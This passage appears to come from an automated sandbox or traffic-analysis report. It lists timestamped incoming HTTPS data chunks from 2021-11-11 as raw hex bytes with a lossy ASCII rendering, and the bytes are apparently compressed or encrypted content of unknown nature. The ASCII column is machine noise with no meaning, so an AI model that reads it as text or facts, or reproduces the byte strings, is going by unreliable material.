                                                                                                                                                                                2021-11-11 11:26:10 UTC5284INData Raw: 31 ae 05 3e 83 d8 72 c2 3d 94 d8 00 81 9c ab 74 5b 89 24 b3 34 10 86 83 69 c0 a6 ae 82 c5 62 a3 9d 56 9b db a2 ba 01 aa 25 fc 12 b9 1e b7 3e 94 30 9a bc 28 9b 37 ff b7 b1 94 d1 c2 33 c0 de 39 d6 03 18 ce 91 85 22 0c 4e 18 bc f4 88 20 b4 36 eb dc f4 e9 80 9d d0 84 e0 22 80 6d a8 25 09 82 42 1c df 30 96 19 73 c7 2a a0 52 e1 12 35 f8 af 66 56 02 47 16 d8 17 8a e9 e1 1f b0 41 a8 da 4a d6 a3 30 1e 66 95 98 19 60 b1 ff fe 71 99 4c 42 5c ae 52 ac 08 52 4d e9 29 13 aa be 21 26 bb 48 32 d9 01 19 20 59 28 3f a8 f7 00 46 d5 5f 6c a0 84 92 01 48 bd fa 98 b0 ea f6 03 80 fa 33 f2 f5 0b 32 30 cb e8 18 fe 00 06 ba 72 30 0d 1e 8e bf ce 5e 3e 81 0d a7 8a d4 fd d2 5e a4 5e 4f 6d a1 1c 6f b8 fd e1 cf 57 7c 18 c5 c6 d5 ae de d0 70 0c b2 88 18 63 0c b0 0b ee 12 65 51 f8 62 e6
                                                                                                                                                                                Data Ascii: 1>r=t[$4ibV%>0(739"N 6"m%B0s*R5fVGAJ0f`qLB\RRM)!&H2 Y(?F_lH320r0^>^^OmoW|pceQb
                                                                                                                                                                                2021-11-11 11:26:10 UTC5300INData Raw: a3 82 93 5c 01 39 02 59 56 44 44 30 15 d4 b4 53 17 b9 4f b4 dc 00 a0 17 16 d1 c3 ba 70 33 f3 9d 2a 05 5d 37 5f 96 f6 01 fa 97 ab 15 5e 40 a2 64 45 21 12 10 93 a6 04 12 ed e1 66 14 80 e0 f6 0b 30 61 4e dc 9a 11 70 19 18 88 33 1c eb 4c 1a 38 99 08 58 46 b3 80 b7 2e 4a fe fd 75 e4 78 26 e9 40 bd 8d 4c 37 2e a8 3f bf 90 61 4a fd c4 2c b9 39 b8 b5 2e 3a bb 48 13 8c fd 35 4e 97 33 22 3c 60 2a ce 4c 27 f3 db 7c 51 62 91 ab 30 8f 14 2a 1f 0d c4 6f 1c 3c 80 dd 2f 60 ac 4c 00 4a 16 8b ca c3 1d a5 96 00 09 e0 fd 95 08 62 87 7f b4 50 87 c0 05 8a bc 8e 6f d4 e5 64 12 3b 45 90 b4 54 5d b3 9d 02 d2 de 50 0a 1c 0c 42 af 24 86 09 4e 66 ca 4f 80 ec 63 34 7b 45 63 a0 f2 0b 14 09 54 87 02 22 75 91 23 19 89 19 f3 67 d4 1e 9d 32 27 f4 8f 58 47 d4 25 9d e8 77 b2 17 09 c2 f4 52
                                                                                                                                                                                Data Ascii: \9YVDD0SOp3*]7_^@dE!f0aNp3L8XF.Jux&@L7.?aJ,9.:H5N3"<`*L'|Qb0*o</`LJbPod;ET]PB$NfOc4{EcT"u#g2'XG%wR
                                                                                                                                                                                2021-11-11 11:26:10 UTC5316INData Raw: 3f 1c 8a 0e 7b e6 25 55 cc b5 b0 53 18 7e 0f 75 f4 31 5c 88 5b 58 51 35 0d 6b 8c 73 33 02 cd f7 3e 48 89 3c 09 55 40 c6 40 14 27 9d 7d e6 e9 8c 0a bc ed 40 68 44 99 73 24 3f 51 68 c1 54 90 b7 ee 55 64 90 83 09 4a a0 a8 90 a2 50 c2 44 f4 d1 17 3d e8 34 c0 53 bb 25 01 ef 4b 3f cf 09 00 40 ff 10 02 31 f3 5e 25 01 d8 74 f8 c3 cb f8 12 0a 42 45 a8 46 00 54 a4 a9 3c 3d 4d 5c 9d 41 0c 72 7f 40 1c b5 e5 b8 89 dd 25 09 40 fc c3 40 67 a1 d0 e8 04 05 3c da ff c4 c2 9e 6c 42 99 d5 40 c1 45 d8 c5 14 1b 32 90 15 b3 e6 c6 1f 29 a5 ba 81 35 e4 d9 7d 40 ff 12 c7 fc 1d b8 a6 4b e2 a0 1e 2c 8f c0 84 39 2b 29 17 e5 2d f8 fd f4 f0 c0 fa 16 64 4c 97 6e c2 03 ce 5b 2b 67 4f 62 e0 cc fe 83 11 3a 01 0c 09 7c e8 26 55 68 9e 8e 0d c1 18 b5 e9 52 eb 02 9c 60 ab 68 bf 13 d2 3f 63 f8
                                                                                                                                                                                Data Ascii: ?{%US~u1\[XQ5ks3>H<U@@'}@hDs$?QhTUdJPD=4S%K?@1^%tBEFT<=M\Ar@%@@g<lB@E2)5}@K,9+)-dLn[+gOb:|&UhR`h?c
                                                                                                                                                                                2021-11-11 11:26:10 UTC5332INData Raw: 1e e3 56 0c 5c 4d 22 0f 3c 04 12 d0 64 10 b7 90 27 a2 40 68 a5 61 0c cb 71 62 fa 4c 1a 12 82 5e 0c 46 68 03 58 d1 08 93 42 56 69 01 06 95 a2 5d f3 fa dd fb 9f 41 4f 8d 99 6a 00 50 53 d5 35 17 83 62 93 ac ce b0 d6 d1 ed 0c 41 27 23 0a 58 58 9b 6e 3e fc c0 e4 9c 2f da ce 83 90 4f 62 3b c6 30 cf 06 48 00 89 41 84 78 9b dc 92 02 ea 2d 70 b9 55 10 54 80 30 3a eb 89 d3 98 78 30 7c d4 cc 0e b7 b4 2d 06 02 26 f3 65 78 30 96 84 70 b6 67 92 4c f1 4c 86 44 c4 2c 0c 26 1e 9d e2 18 ca 00 91 65 32 83 7f cd 50 3e 0a 5f 51 f4 79 42 83 0b 49 df 36 d4 8c 1a 88 70 5b d8 79 48 93 0a 00 64 47 29 5f 27 28 e1 54 02 1d cf f4 19 cd d8 83 b2 aa 03 04 98 ff 14 9a de 18 18 60 ea 80 b2 68 5f a5 88 24 fc 27 20 d9 79 18 41 8f bf 40 82 25 75 43 cc 0e 01 6a b7 01 11 41 69 20 4a 96 07 3c
                                                                                                                                                                                Data Ascii: V\M"<d'@haqbL^FhXBVi]AOjPS5bA'#XXn>/Ob;0HAx-pUT0:x0|-&ex0pgLLD,&e2P>_QyBI6p[yHdG)_'(T`h_$' yA@%uCjAi J<
                                                                                                                                                                                2021-11-11 11:26:10 UTC5348INData Raw: a8 94 28 e1 0a 0c 05 aa 13 9a 8e 2b d0 3e a7 68 93 c1 34 bd 3a 75 45 20 3c 11 09 a1 d6 64 9f df 02 f6 44 ff 32 75 ae 34 02 05 54 79 80 da 83 72 b7 34 31 07 5d 1c 7e f1 3a 76 92 28 0c 71 1a e0 0f 0c 18 02 42 cf 6b d0 84 58 df b4 e0 0d 0c 40 a0 08 a8 c0 dc 20 3d 53 5d 5a b1 5e 2f 28 3e a3 06 fb dd cd ed 28 40 2d 38 6a 18 10 a4 24 1d 1a 58 63 7a 00 68 b3 3f 90 19 c3 dd 04 66 4c fc 67 02 fe 60 2c 54 95 05 41 e0 8c ac dc a4 78 de 2f 16 ea e1 10 f9 3b ba 2c b8 32 13 01 c0 af f9 5c d2 b0 88 97 9c 74 bd 2f df 23 da ae 93 12 30 bf 19 e9 ac 06 ea 90 e0 cc 18 a1 14 48 10 96 ca ac e7 2a e7 ec 03 34 b9 5a 7f f0 8e ac 12 43 09 a0 c2 d8 90 43 76 06 29 b3 96 74 12 18 2d 62 97 c4 5c 60 ca ac 37 8a 39 84 61 04 f5 50 a9 73 78 fa 17 b7 ea bd 10 c6 48 c8 28 00 d5 46 3a 22 28
                                                                                                                                                                                Data Ascii: (+>h4:uE <dD2u4Tyr41]~:v(qBkX@ =S]Z^/(>(@-8j$Xczh?fLg`,TAx/;,2\t/#0H*4ZCCv)t-b\`79aPsxH(F:"(
                                                                                                                                                                                2021-11-11 11:26:10 UTC5364INData Raw: 58 c0 bf c8 25 0d f5 8e 84 a0 58 17 ef 9c 6c f0 18 08 7d 3d 40 5a 8c 58 5f 04 32 38 1c 92 9b 1a 60 48 80 f1 e2 e5 13 c0 78 de 76 a7 30 f7 5a 81 c1 f6 1d 02 c2 54 92 e0 a4 67 d4 7b c1 0c 76 c8 84 15 b1 fe 78 79 62 2f 9d 06 3a eb 74 71 af f9 68 0e b7 41 03 05 0d e1 a8 e4 0c 09 8b 42 6c b6 04 05 ff 1f 1c f4 81 86 c0 46 2e 9d 80 40 4a e8 8f f9 60 77 0c 6a f8 ec 20 31 9a 36 f8 5e 69 09 2a 52 ee f0 38 d7 06 a6 47 51 23 ac 56 00 3b de 71 0d d8 ba 9a 91 c0 26 38 94 60 29 ad 24 17 a3 1e 00 5a be 3b d1 3e f6 31 56 27 50 88 d2 83 42 a0 14 b3 1a 02 6c 1d a5 70 46 ff 77 fe 27 60 b2 3e 3d 21 07 d1 aa 0b ae 06 11 7d 32 a4 74 0c 83 18 e9 e0 57 bc c6 f6 a0 b2 99 b9 03 5d cf ce 3a a2 56 06 28 65 1a 2c 3e a6 25 90 c1 dd 3c 34 18 2b b8 04 15 d0 ae 79 a5 c1 94 0e e1 f6 83 6f
                                                                                                                                                                                Data Ascii: X%Xl}=@ZX_28`Hxv0ZTg{vxyb/:tqhABlF.@J`wj 16^i*R8GQ#V;q&8`)$Z;>1V'PBlpFw'`>=!}2tW]:V(e,>%<4+yo
                                                                                                                                                                                2021-11-11 11:26:10 UTC5380INData Raw: 20 cb 4e d9 a8 b6 e4 ed 0c 1d 78 ed 27 d5 1e e4 09 92 13 b7 1b 75 cd 8d c9 d7 1f 83 a7 5e 0c 5c 4b 57 aa 79 44 71 19 2f ab 2f a0 5b db 60 5a bf 6a fa 4c d1 81 18 2f ef 7d 2f 7c 5e 90 13 87 fd 7b af 2f e3 93 be b3 aa b0 c2 90 7f b0 22 de 7f 42 14 69 37 6b 7d a5 2c 5e 8b b5 3a 4c c0 17 06 dc da 16 23 2b 60 ea c5 4b 3d 81 c1 26 03 6d 09 04 0a 3b 98 25 04 49 ef ed 13 17 d8 53 90 35 76 19 34 40 36 cd 97 64 91 18 de ec 28 25 91 f1 75 4b 80 2b c3 99 31 04 e2 83 a3 41 b5 55 8b 7e 01 17 d0 00 86 0d 06 6b 76 90 7d 64 8f 36 23 69 44 9a 12 12 78 fd b0 67 7f f0 1e 71 3d 01 60 30 80 83 3e e6 97 2e f8 b3 81 a1 2c a0 01 08 7d 59 32 3b 25 14 52 53 3b 2a 60 13 be 62 b8 44 c0 cc 47 7c 41 d8 00 57 5c a3 9e 53 9d 96 5b 73 e0 12 54 38 62 d1 46 f3 3a c0 ba 01 97 b0 84 f9 c2 25
                                                                                                                                                                                Data Ascii: Nx'u^\KWyDq//[`ZjL/}/|^{/"Bi7k},^:L#+`K=&m;%IS5v4@6d(%uK+1AU~kv}d6#iDxgq=`0>.,}Y2;%RS;*`bDG|AW\S[sT8bF:%
                                                                                                                                                                                2021-11-11 11:26:10 UTC5396INData Raw: 20 1e e3 28 c5 ce b8 0c e8 94 ed 14 90 08 be 82 02 01 e1 96 90 81 ca 70 63 fe 64 5a 95 04 18 23 e3 26 9a 81 60 de f4 6e 90 54 4c 7f 2b 13 4f 86 0f d0 8c ea e7 f5 60 1b 5c cb 80 2c 25 28 cc b5 92 2d f4 36 1a 44 5e 50 89 11 ab 08 aa 82 01 3e d8 2f 08 31 3c 7c 2b e6 1a b0 0c 2f 38 63 b7 e5 10 04 14 6b 68 41 d2 41 35 4e 01 52 c5 08 7b 2d 37 40 64 f0 08 a9 7a c7 87 0c 68 b5 70 2d 18 7d 1b 85 14 2a 03 94 f2 6c a8 54 4f 07 d4 48 88 7d 8e 2d 9e 27 e3 7e aa c7 09 02 4e cf ae 00 e7 47 9a 6c c0 4c 97 0d 27 3c ad 92 7a 0f 36 1e a8 37 d2 ee 68 ec a4 10 37 0e 22 1e b1 a6 06 44 f5 11 f0 25 ca d3 1b f8 3e a4 38 0b 7f 49 f4 dd 66 d0 c7 50 4e f6 b9 f4 a3 c9 f5 fb b0 c3 e2 7c 12 08 a0 d7 ad 5e 4e 97 26 29 55 71 b3 d8 1a b7 80 d6 ea 47 fe c1 d9 1b 7b 5c 92 24 a6 13 cf b0 86
                                                                                                                                                                                Data Ascii: (pcdZ#&`nTL+O`\,%(-6D^P>/1<|+/8ckhAA5NR{-7@dzhp-}*lTOH}-'~NGlL'<z67h7"D%>8IfPN|^N&)UqG{\$
                                                                                                                                                                                2021-11-11 11:26:10 UTC5412INData Raw: 00 b3 5b 4f 4b 41 13 b2 40 5e e0 7c 79 28 02 18 62 b0 8c 68 0f 18 90 08 f6 74 01 23 52 2f 2c f4 7b fd 1e 61 80 51 6a f3 2f ed 44 c2 76 20 d1 20 03 02 08 62 80 e4 2e bd 11 9c b5 32 8c 1e 75 c4 10 6a a1 86 f3 62 70 04 5d 57 de 7c 04 da 47 b4 0c 22 25 0d a3 44 a2 20 86 2d 78 03 35 0a 72 28 00 04 8f aa 06 12 f0 ff 3a a2 f0 cf e0 84 36 97 ee a2 ec 82 35 1f 29 b8 50 47 24 44 28 70 f0 2a 40 39 6e 50 e8 74 21 4c 20 1a 0f 91 eb c3 78 58 98 ed c1 20 dd 09 c5 cf 3b f8 7c 62 3c a8 4f 78 64 bd f4 58 60 ab fe 86 2f 25 1e f3 55 1c 4f 4f ec b0 fc 3f 50 12 6c be 4f 16 f2 9a c1 97 d5 d8 18 69 48 c0 4b 34 b6 16 c0 b5 80 7a b1 d4 38 76 c6 2a 77 a2 24 30 7a 25 38 20 06 ad 9d 93 fa 00 24 0f f6 9d 4c fe 26 43 75 8f 01 6e e4 04 e9 b1 57 64 28 70 c1 52 c6 a1 e1 10 01 4a d2 81 34
                                                                                                                                                                                Data Ascii: [OKA@^|y(bht#R/,{aQj/Dv b.2ujbp]W|G"%D -x5r(:65)PG$D(p*@9nPt!L xX ;|b<OxdX`/%UOO?PlOiHK4z8v*w$0z%8 $L&CunWd(pRJ4
                                                                                                                                                                                2021-11-11 11:26:10 UTC5428INData Raw: 77 49 32 7d 61 a9 85 2c 55 04 7d bd 42 43 f9 25 12 76 bb ea 17 61 ff 31 69 ef e5 97 0c 35 80 f3 ce f8 94 06 7a 64 85 d5 27 1c 0c db c7 06 53 30 d3 9f 7c c5 89 14 04 10 de bb 6d 59 37 2e 34 26 22 d0 2e 5c c2 38 88 b1 80 20 59 05 28 9d 29 24 24 7b 2f e8 47 1b df cc 5f 24 c9 5e a9 4b 49 04 76 3b 00 66 43 c7 70 4c 13 1c 3a 76 b2 59 f8 b6 31 e9 53 80 30 1f 1b 80 71 92 1a 30 2b be 68 7e 58 52 38 81 2f cc 78 16 c5 a2 f4 fc e7 60 08 24 12 2d de b4 c0 88 27 d4 b9 10 02 0e dd c3 3f 7d 63 3c 6c 60 90 1a 2e 40 13 64 3b 07 e4 25 be 44 29 44 1c 7d 15 16 43 55 f5 93 2e 00 24 dd 0c 9e 5c 40 3e 51 0b 1e 78 17 d8 54 ad 05 36 44 11 ac 0d 0f 2f a8 a7 25 fe 38 ff 6c 99 cc 1b ea 6c 27 0c a0 12 76 1f 28 21 ab ee 17 f1 df fd a6 31 60 68 a9 a3 cf 71 c0 a8 06 2e 1e 37 10 97 05 75
                                                                                                                                                                                Data Ascii: wI2}a,U}BC%va1i5zd'S0|mY7.4&".\8 Y()$${/G_$^KIv;fCpL:vY1S0q0+h~XR8/x`$-'?}c<l`.@d;%D)D}CU.$\@>QxT6D/%8ll'v(!1`hq.7u
                                                                                                                                                                                2021-11-11 11:26:10 UTC5444INData Raw: 2e b9 90 76 27 e6 37 df 33 32 07 4c cb a5 a3 60 2e 00 55 2d 0e 18 0a 62 38 1c 3c 6a df 71 ac 40 27 9d 32 58 ce 34 0a e1 31 4f 06 35 97 10 18 b1 2a 19 4e 22 ea 09 ec fa 94 55 10 fb 2e 72 c2 30 a4 14 40 57 4a 74 53 bc c2 0d ba 02 ab 79 14 4b 40 3e e2 10 47 3c 34 96 4d a8 a8 4e ec d8 e4 eb ad 0b 18 3c 8a 5f 86 ff b7 7e 43 ed 2b 86 68 23 0b 40 4d c5 54 9b 62 18 34 32 c0 5c d4 08 65 16 c4 7b 9c b2 93 e6 b9 88 c0 7d 20 5f 3c 21 54 5c 08 f6 6b 47 7f 72 91 32 02 e4 07 fa c6 18 e8 c7 58 25 82 81 20 12 5c 2a 7e 27 cc 1b 08 44 4f 48 18 28 d6 69 3c 64 57 fa e1 a4 cc 5d 99 98 0c b9 05 94 19 79 02 b4 14 34 9c 41 57 df 67 08 bf 2d 5f 60 20 a4 05 e1 0f 0b 68 da ec 89 6b 12 5d 76 b6 13 dd a0 2d ea cb 06 d3 d6 d5 71 5d 22 ab 0a 61 a5 4b bc 17 d0 09 b5 79 98 48 31 32 27 f5
                                                                                                                                                                                Data Ascii: .v'732L`.U-b8<jq@'2X41O5*N"U.r0@WJtSyK@>G<4MN<_~C+h#@MTb42\e{} _<!T\kGr2X% \*~'DOH(i<dW]y4AWg-_` hk]v-q]"aKyH12'
                                                                                                                                                                                2021-11-11 11:26:10 UTC5460INData Raw: 31 3a 5d 79 a7 60 36 9d 1d fd 0a 2b 0c 08 24 ac 02 a0 d0 37 2e 7d 64 9d 32 33 40 5c 69 80 b4 6f ed 22 05 9c 54 89 13 a2 54 be 80 7e 52 31 4a a8 0d b5 98 78 e7 03 ec 23 a0 2a 30 5c 80 ef 4e 30 99 42 48 90 65 10 13 50 5f 3d 02 32 81 a4 02 ee ae 95 60 ee e2 8f 60 6e 70 32 07 1d 4c 5c 21 fc 40 e0 a9 94 16 6c 24 3c 01 18 3b ef f2 0d 08 64 70 d8 84 03 6d 8e a8 4a 49 fa aa 05 56 b8 40 8a 55 06 53 81 b8 7c 58 0f 0e 58 92 9b 14 e0 9c a3 85 00 16 3c de dd 7b c1 d9 56 30 f4 72 40 39 ab b8 00 b2 0f 7f 41 ce f7 f5 02 c6 19 99 ea a8 0c f1 62 cf 0e a0 b8 05 98 56 23 24 29 0e 84 76 fe ea 7c 54 48 a4 2e 26 3b fc 73 38 02 23 8f 56 5d 33 7d 82 6a c6 e8 56 ce e5 4b c1 f4 e2 93 d4 f7 c4 bf 01 bf d7 59 f5 9d 1a bf 03 26 81 a3 f2 00 3c 23 63 f0 ca 85 aa 1c 00 e7 08 76 46 6c ea
                                                                                                                                                                                Data Ascii: 1:]y`6+$7.}d23@\io"TT~R1Jx#*0\N0BHeP_=2``np2L\!@l$<;dpmJIV@US|XX<{V0r@9AbV#$)v|TH.&;s8#V]3}jVKY&<#cvFl
                                                                                                                                                                                2021-11-11 11:26:10 UTC5476INData Raw: 91 14 02 b7 0f 9f a7 40 02 70 75 30 c1 a8 c6 98 c3 be 5a 6c d6 39 08 38 5d 49 54 97 fe 00 87 62 94 bb 5e 42 cd e0 13 31 1d 98 00 99 71 ff 95 b4 74 4d 08 29 20 ab 04 0f 86 f8 c2 e4 83 52 60 8b f1 aa d1 9e e0 44 b9 88 67 1c 14 df 7b 79 44 a5 f8 66 9f 9f ba 1d b5 60 08 05 0e f5 ff f2 03 a4 49 ff 82 1d 7c 86 e0 e1 c8 68 01 80 1f e6 20 46 3c 3d b9 d1 c4 66 50 df a5 33 7b a9 00 95 1d f0 c4 db 53 6f c6 7e b6 94 04 41 fe 47 a5 16 a0 31 1e f3 18 e4 eb 31 bb 81 18 f4 d4 80 0b 04 7a 98 5e 2b 12 16 fa 4e 28 02 26 00 c9 61 89 84 17 44 a4 05 25 e9 e4 96 de bf 24 de d9 af 64 ee 95 e6 05 7a 7c 6e f3 29 8a 05 10 25 79 05 82 3c 31 ff 7f 5d 30 68 4d 5a f6 56 b4 38 45 14 a2 4e 85 81 c2 13 15 b4 29 b0 16 ac be 67 8a 55 d2 20 de 6e 80 fb 5a 6f e8 b4 80 f0 df 2c 45 08 9b e8 12
                                                                                                                                                                                Data Ascii: @pu0Zl98]ITb^B1qtM) R`Dg{yDf`I|h F<=fP3{So~AG11z^+N(&aD%$dz|n)%y<1]0hMZV8EN)gU nZo,E
                                                                                                                                                                                2021-11-11 11:26:10 UTC5492INData Raw: 18 fc bc b9 25 64 7d 20 a4 31 11 be e7 03 14 bd 4f 9a 0f 12 d6 52 e1 30 8c 76 7f f5 85 cd c3 7f 81 f9 ee 73 bd 90 86 84 42 23 e5 16 38 d5 eb 5e ae 30 12 4a 02 16 41 05 01 ca cb 95 9f 18 27 08 c2 03 00 4c f8 d3 e4 ab 25 f8 97 38 d8 f7 30 32 1c 71 58 74 5f 62 ff 61 32 0c 80 30 3a ee 0b 48 ba 1d b2 50 aa 0c 8c 96 f1 78 30 04 b5 83 9a d9 c2 18 4c 68 b6 24 14 cf 02 8b 78 a9 10 57 5a df 68 9a b1 74 c9 d6 90 d5 e6 88 00 f6 4f 04 d4 96 25 df 7b 27 95 17 e6 f8 08 7f 71 f6 ff 71 87 7a 78 1c 53 9f 8b ca 79 1c 64 e5 2c 70 24 a2 f9 6e 06 9c de c7 b0 30 68 7d d8 db fb e9 02 8f 13 fc 65 ce 7a e1 cb 82 d0 96 e1 4b 9d fe 9e 7e 18 ef be 08 c4 5f c9 50 48 75 4e 5c a5 d0 a1 26 63 f9 74 12 2c 92 fa 2a d0 05 91 89 3b 5f ac 22 0a f7 cf 2f bc 0b 42 9d 7f 60 ac 85 32 c0 30 c2 a3
                                                                                                                                                                                Data Ascii: %d} 1OR0vsB#8^0JA'L%802qXt_ba20:HPx0Lh$xWZhtO%{'qqzxSyd,p$n0h}ezK~_PHuN\&ct,*;_"/B`20
                                                                                                                                                                                2021-11-11 11:26:10 UTC5508INData Raw: 4b 7d ff d1 da 24 14 9d 50 8f 0f 36 19 94 d8 82 eb b4 3b 14 11 ac 68 a3 1d 67 4f 90 14 1c 2e e6 22 28 ea ec c2 00 b1 35 8d d7 9a da 37 e7 00 70 82 6d 0e 9c 68 25 c3 16 7f 7d 4c aa dc a5 2c f1 2b 4c ee ce 22 f5 b5 0f 18 c5 e9 5d fe 9d eb 19 1e 3f 08 94 ea 0b d5 5a 75 ce 4b 0b bb 33 cf 50 5d 34 b7 71 90 6e fe 0a 02 4a fd 5f 70 6d 4f c5 be 24 4b bb e6 09 04 91 90 ff 77 e0 6b 54 cd b2 dc c8 6a 84 a9 34 33 ff 2e 47 90 16 a0 68 96 bc 25 df 7b 7d 47 46 49 77 79 a4 c2 41 51 5c 30 54 5f 59 fc fa ac 1c 9f db 63 73 fb 8b 9c 30 68 31 9a 27 ff 6f f5 15 79 a7 fb bc 2f fd b0 90 5c 41 69 57 04 df 85 f9 36 0e b8 6b 14 20 4e 4b 4d 5b d9 51 20 13 b5 87 9a a7 1e 09 10 f9 04 61 e9 1d b9 6e c5 ea ee b6 88 cb af 78 b2 27 8c 2e 74 18 2d 55 96 5f 9f e5 46 62 e0 7f 02 5f 97 15 00
                                                                                                                                                                                Data Ascii: K}$P6;hgO."(57pmh%}L,+L"]?ZuK3P]4qnJ_pmO$KwkTj43.Gh%{}GFIwyAQ\0T_Ycs0h1'oy/\AiW6k NKM[Q anx'.t-U_Fb_
                                                                                                                                                                                2021-11-11 11:26:10 UTC5524INData Raw: b7 50 7e 9d 93 3c 91 c2 b7 98 24 e1 10 ce 79 31 3e 71 44 69 83 24 ea 77 0c c9 59 c4 a2 48 e3 9f 81 56 26 fd 42 a0 7d c8 30 fe 85 44 f7 96 9e 5e e2 8a ca c4 c6 5e 0e 8c 28 fc fe 20 5b bc 15 78 ae fd 26 b0 fd c3 88 70 95 b3 78 9f 6e 09 34 27 7b e6 80 c2 b9 b7 0a 80 f4 c0 e4 84 51 d0 32 94 12 34 c0 bf 0c 76 83 1d 3e fc 6d 06 79 a4 c1 13 ee 78 00 e3 34 5a 60 f5 21 61 95 69 f9 44 d1 ca 02 e2 16 da 67 df 53 d6 1d c5 c9 c9 7a 8c 8f d4 df 12 4a e1 34 b0 36 0c df a0 41 d5 a0 32 9e f0 bd b8 0b b4 07 10 ab 24 c0 a4 39 41 b7 dc 96 40 d4 05 2e ee 53 03 8e 09 f7 6b 9c 58 0c 02 de dd 52 31 ac 33 51 44 6d 14 40 70 9c 2f dc 60 47 64 0f f0 ba 54 59 68 ca 13 56 a2 fe 70 9c 04 e4 e9 19 44 43 3b ec fb 30 19 ce cb ac a9 40 46 a8 b7 0c 37 04 1a 46 40 a0 12 cf 15 0b 4a 6c fb fa
                                                                                                                                                                                Data Ascii: P~<$y1>qDi$wYHV&B}0D^^( [x&pxn4'{Q24v>myx4Z`!aiDgSzJ46A2$9A@.SkXR13QDm@p/`GdTYhVpDC;0@F7F@Jl
                                                                                                                                                                                2021-11-11 11:26:10 UTC5540INData Raw: 81 01 3c 99 7d 5e 0f 83 c1 a5 19 f1 d9 01 68 6e f4 ef 7f d4 a8 fa 75 7e 9d ff 94 81 09 94 8e f5 3b dd e8 91 5e 61 2d 7c 77 1a 5d ff d9 93 00 cc d2 86 3b 44 01 41 f8 3a bd dd 00 81 f1 65 7d ed 3e 0f 98 1b 97 4e cb a0 f9 87 2d 0a 08 d1 01 f1 e5 43 e9 53 50 2d b5 2a 2f be 06 ec 1e 0b b3 de e3 4b f0 d0 80 07 31 c8 9a 2f 9d ff 9d 40 00 68 fa 1a bf 7d 53 9d f7 18 cc 83 21 2d ff 7e 79 66 e8 ce c5 35 05 17 e9 7f 01 5f 69 4f fe 75 22 56 01 57 bf 31 f6 5f 77 40 a0 b9 5b f0 7f 37 7a fe ee f5 02 16 7f 39 c1 e1 05 84 9b 0d 21 d5 fe 92 0b de f0 b1 eb 4f c3 fe 28 6e 12 17 01 a8 0b a7 bc 48 eb 13 26 a6 09 aa 6c d5 92 b8 61 22 be 7b 05 36 cc 4c ae d2 a6 da 7f 9c 8a 0b 6f d4 9c cf fd 38 88 3c ba 13 02 39 fc e0 39 f9 25 dc 66 54 36 13 98 e0 6b 16 0c 62 4b 57 fa 25 c3 76 c9
                                                                                                                                                                                Data Ascii: <}^hnu~;^a-|w];DA:e}>N-CSP-*/K1/@h}S!-~yf5_iOu"VW1_w@[7z9!O(nH&la"{6Lo8<99%fT6kbKW%v
                                                                                                                                                                                2021-11-11 11:26:10 UTC5556INData Raw: 58 71 9c ef 2f 22 c4 20 df 46 a4 c6 38 3d cd 12 26 fd 2e fc 42 2c d5 d5 65 76 82 f4 d4 e6 33 5d f6 a8 c0 fa 16 6e 6c 99 b6 c3 14 e5 e5 36 18 08 4b 34 82 c3 02 5c 51 4c a6 52 60 99 30 c6 9d 71 df 80 1e 49 06 67 79 c9 da 0a 99 05 d8 9e 6d 9c 86 83 c5 e3 0f 4c 5c a1 73 98 14 ac 5f 30 42 e8 bc 89 51 02 e0 1b 18 88 24 14 68 76 75 00 68 03 c6 8f 1e 9f 58 46 13 38 4a 32 a0 8b 4b 03 77 1d 01 d9 6a a2 82 87 56 c3 0a 54 d5 c0 40 61 bc b5 d4 78 d0 13 dd c5 09 ff 88 21 50 4e 7c 40 7e 9f c9 5d d7 a7 09 f6 a3 1f f7 d5 f1 e6 0c a4 87 a0 aa 25 e8 46 75 2f d8 8c 5b 18 32 10 ef de f1 3d 78 7c 03 14 9c 8d 83 fb fe e1 97 5f 66 a4 65 4e 4e e2 cb 19 40 dd b4 06 54 0c c1 0a 1b 07 82 30 af b0 9a fb c4 0c 31 74 a8 30 1d a7 f3 7e 79 50 d7 b2 29 0e 4f 83 c5 dc 00 02 ee 80 bd fc 31
                                                                                                                                                                                Data Ascii: Xq/" F8=&.B,ev3]nl6K4\QLR`0qIgymL\s_0BQ$hvuhXF8J2KwjVT@ax!PN|@~]%Fu/[2=x|_feNN@T01t0~yP)O1
                                                                                                                                                                                2021-11-11 11:26:10 UTC5572INData Raw: 70 f4 c0 8e ab 00 0f c8 7b c9 f1 c2 85 eb 2d 65 d5 00 02 16 48 d6 59 00 ce 6f 9d c5 97 9b 30 6a 30 be 1d 64 5e e1 9a 7e 42 02 ae 73 dc 3d 82 52 43 bf 60 85 68 e9 91 ba 3e 30 d1 64 54 eb 02 25 04 5a dd 6b 5e 17 ec cc b0 97 d5 bf 4a 3d dc d8 39 f9 40 82 82 21 63 2d 5a be 83 00 ca dd 01 2c 0f 19 3f 65 da 32 8c 18 75 40 74 b4 01 55 81 8b b2 f0 12 a6 42 9a b5 c9 8a d5 f3 50 88 a5 ad 60 5d 38 8e b9 8d 3f 00 29 14 ec e8 64 51 36 3a b4 ee f8 29 b5 80 27 d6 47 fd da 1c 34 26 20 80 b3 25 af cd df 62 e5 1c 26 48 5d 4a 24 1d 86 1d 55 85 95 be bd 00 94 ec ca 05 30 67 38 e6 09 2c 01 2c 51 55 11 97 94 3d 84 5f 8b 86 08 01 4f fd e0 f0 5c 17 b5 0e e7 d6 c9 40 c2 f3 8d 80 81 a2 03 78 4a 3a f2 65 82 6c c2 a3 20 55 61 e3 5f 80 d5 a2 84 31 d7 a0 d8 52 85 7f 8c 3c bc 00 fa af
                                                                                                                                                                                Data Ascii: p{-eHYo0j0d^~Bs=RC`h>0dT%Zk^J=9@!c-Z,?e2u@tUBP`]8?)dQ6:)'G4& %b&H]J$U0g8,,QU=_O\@xJ:el Ua_1R<
